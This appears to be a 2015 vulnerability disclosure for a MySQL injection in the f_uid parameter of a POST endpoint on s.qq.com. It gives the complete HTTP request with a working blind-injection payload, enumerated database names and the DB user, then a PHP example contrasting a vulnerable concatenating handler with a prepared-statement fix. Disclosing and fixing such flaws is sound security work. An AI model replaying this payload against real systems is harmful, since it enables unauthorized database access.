2015-06-21: Details reported to the vendor; awaiting vendor handling
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-07-03: Details disclosed to core white hats and relevant domain experts
2015-07-13: Details disclosed to regular white hats
2015-07-23: Details disclosed to intern white hats
2015-08-07: Details disclosed to the public
MySQL injection on a QQ site (union supported)
Injection point:

POST /json.php?act=addChannel&dir=&mod=ComponentInfo HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://s.qq.com
Host: s.qq.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

f_channel_name=test&f_uid=-1' OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --
The f_uid parameter is injectable (MySQL union-based injection).
available databases [6]:
[*] db_game_center
[*] db_game_center_pre
[*] db_gamecenter_app
[*] information_schema
[*] mysql
[*] test
[Done] MySQL user is [email protected]
Current db is db_gamecenter_app
Database: db_gamecenter_app [65 tables]
Fix suggestion: parameter filtering
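The remediation above, shown as an added example that is not code from the affected site or the original report: a handler in the vulnerable shape (the f_uid value concatenated into the SQL text, which is what lets the probe above close the string literal) beside a hardened one that validates f_uid as an integer and binds both values with a PDO prepared statement. The handler and table names are assumed for illustration.

```php
<?php
// Added illustration, not code from the affected site. The handler shape and the
// table name t_channel_demo are assumed; the request fields match the report.

// Vulnerable shape: f_uid is spliced into the SQL text, so a value such as
//   -1' OR ... --
// closes the string literal and the remainder is parsed as SQL.
function add_channel_vulnerable(PDO $db, array $post): int {
    $sql = "INSERT INTO t_channel_demo (uid, channel_name) VALUES ('"
         . $post['f_uid'] . "', '" . $post['f_channel_name'] . "')";
    return $db->exec($sql);
}

// Hardened shape: validate each parameter against its expected type, then bind
// it as a value so the database never interprets it as SQL.
function add_channel_safe(PDO $db, array $post): int {
    // f_uid is a numeric identifier: accept only a string of decimal digits.
    if (!isset($post['f_uid']) || !ctype_digit((string)$post['f_uid'])) {
        throw new InvalidArgumentException('f_uid must be a non-negative integer');
    }
    $name = (string)($post['f_channel_name'] ?? '');
    if ($name === '' || strlen($name) > 64) {
        throw new InvalidArgumentException('f_channel_name must be 1-64 bytes');
    }
    $stmt = $db->prepare(
        'INSERT INTO t_channel_demo (uid, channel_name) VALUES (:uid, :name)'
    );
    $stmt->bindValue(':uid', (int)$post['f_uid'], PDO::PARAM_INT);
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->rowCount();
}

// Self-contained demo on an in-memory SQLite database (constructed sample data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE t_channel_demo (uid INTEGER, channel_name TEXT)');

// The probe body from the report: the hardened handler rejects it before any SQL runs.
$probe = ['f_channel_name' => 'test',
          'f_uid' => "-1' OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 -- "];
try {
    add_channel_safe($db, $probe);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
// A well-formed request still works through the hardened path.
echo add_channel_safe($db, ['f_uid' => '42', 'f_channel_name' => 'test']), " row inserted\n";
```

The vulnerable function is included only to show the string-concatenation shape; the demo never executes it with the probe.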
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-06-23 10:54
Thank you very much for your report. The issue is already being handled; we appreciate everyone's attention to the security of Tencent's services. If you have any questions, feedback is welcome and a dedicated person will follow up.
None yet